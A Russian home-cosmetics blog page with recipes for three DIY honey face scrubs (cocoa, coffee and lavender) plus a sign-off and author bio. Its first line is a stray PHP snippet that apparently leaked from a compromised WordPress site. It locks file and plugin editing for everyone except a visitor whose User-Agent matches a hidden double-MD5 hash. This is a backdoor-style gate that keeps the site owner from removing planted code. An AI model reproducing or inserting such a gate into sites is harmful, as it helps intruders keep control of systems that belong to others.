if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Делаем самостоятельно питательный медовый скраб | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Делаем самостоятельно питательный медовый скраб

Что делает нашу кожу лица безупречной? Непрерывный уход и питание, ведь в современном мире так много токсичных веществ, которые оседают на коже и делают ее дряблой и стареющей

Что дела­ет нашу кожу лица без­упреч­ной? Непре­рыв­ный уход и пита­ние, ведь в совре­мен­ном мире так мно­го ток­сич­ных веществ, кото­рые осе­да­ют на коже и дела­ют ее дряб­лой и ста­ре­ю­щей. Но так ли необ­хо­ди­мо тра­тить огром­ные сум­мы на то, что­бы про­длить моло­дость сво­е­му лицу? Ведь при­ро­да дает нам столь­ко воз­мож­но­стей выгля­деть моло­же и под­дер­жи­вать свой орга­низм вита­ми­нам, но не все поль­зу­ют­ся при­род­ны­ми дара­ми. Пред­ла­гаю вам сде­лать медо­вый скраб само­сто­я­тель­но, кото­рый помо­жет очи­стить клет­ки дер­мы от внеш­них повре­жде­ний. Доста­точ­но исполь­зо­вать такой скраб 1–2раза в неде­лю, и вы заме­ти­те улуч­ше­ния на сво­ем лице, чистом и сияющем.

Медовый скраб с какао

Такой скраб помо­га­ет снять отеч­ность, под­тя­нуть кожу и тони­зи­ро­вать клет­ки дер­мы. Ингредиенты:

  • Мед нату­раль­ный – 100 грамм
  • Мас­ло олив­ко­вое – 100 мл
  • Соль – 2 ст. л.
  • Какао —  50 гр.

Все ком­по­нен­ты сме­шай­те в одну мас­су, и вти­рай­те в очи­щен­ную кожу в тече­нии 2–3 минут. Подо­жди­те еще пару минут и смой­те. Такой скраб с какао мож­но так­же исполь­зо­вать для все­го тела.

Медовый скраб с кофе

Кофе поз­во­лит уда­лить с кожи омерт­вев­шие клет­ки, а мед раз­гла­дит и увлаж­нит, сде­ла­ет кожу бар­ха­ти­стой. Ингредиенты:

  • Мед нату­раль­ный – 2 ст. л.
  • Моло­тый кофе – 50 г.
  • Заро­ды­ши пше­ни­цы – 1 ст. л.
  • Мас­ло вино­град­ных косто­чек – 1 ст. л.

Сме­шай­те все ингре­ди­ен­ты в емко­сти и тща­тель­но разо­три­те. Оставь­те полу­чен­ную смесь на пол­ча­са, за это вре­мя рас­парь­те кожу и може­те при­ме­нять скраб. После при­ме­не­ния кофей­но-медо­во­го скра­ба ваша глад­кая кожа будет пах­нуть аро­ма­том кофе.

Скраб с маслом лаванды

Соче­та­ние эфир­но­го мас­ла лаван­ды и нату­раль­но­го меда не толь­ко дели­кат­но очи­ща­ет кожу, но и поз­во­ля­ет раз­гла­дить мел­кие мор­щин­ки. Ингредиенты:

  • Заса­ха­рив­ший­ся мед – 10 ст. л.
  • Овся­ные хло­пья – пол чашки
  • Сахар – 5 ст. л.
  • Эфир­ное мас­ло лаван­ды – 15 капель

Хло­пья необ­хо­ди­мо пере­мо­лоть. Затем пере­ме­шай­те все ком­по­нен­ты и исполь­зуй­те после кон­траст­но­го душа. Не забы­вай­те о полез­ных свой­ствах нату­раль­но­го меда, и для более луч­ше­го эффек­та исполь­зуй­те его и изнутри!


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Katerinka666

Люблю все творческое и считаю что нет цены тому, что сделано своими руками! С удовольствием делюсь своими мастер-классами и пользуюсь чужими для совершенствования своих навыков! Читайте все мои записи!